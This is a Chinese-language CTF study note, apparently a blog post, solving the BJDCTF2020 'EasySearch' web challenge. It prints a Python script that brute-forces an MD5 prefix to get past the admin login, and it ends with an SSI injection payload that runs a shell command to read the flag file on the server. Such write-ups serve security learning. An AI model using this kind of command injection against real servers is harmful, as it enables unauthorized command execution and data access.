「配枪朱丽叶。」

RootのCTF学习笔记。

BJDCTF2020/BUUUCTF:WEB-EasySearch

在/index.php.swp里发现了源码:
https://s2.ax1x.com/2020/02/01/1GUjJA.png
首先看到这段:
https://s2.ax1x.com/2020/02/01/1GaEJs.png
如果要进后台,就需要写脚本爆破看哪个字符串的md5前六位是6d0bc1:

import hashlib

password = "0123456789"
for o in password:
    for p in password:
        for q in password:
            for r in password:
                for s in password:
                    for t in password:
                        for u in password:
                            chr = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(chr.encode('utf-8')).hexdigest()
                            if ((md5[0:6])=='6d0bc1'):
                                print(md5+" : "+chr)

https://s2.ax1x.com/2020/02/01/1G86bj.png
有三个符合的,这里我就用2020666登录啦:
https://s2.ax1x.com/2020/02/01/1G8qaR.png
在响应包看到了这个,访问一下里面没什么有效信息:

Hello,admin
data: Saturday, 01-Feb-2020 09:10:44 UTC
Client IP: XXX.XX.XX.XX

学到了新的知识点,shtml页面的SSI注入漏洞
https://s2.ax1x.com/2020/02/01/1GYXin.png
查看响应头的页得到“flag_990c66bf85a09c664f0b6741840499b2”。
然后查看它得到flag:

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->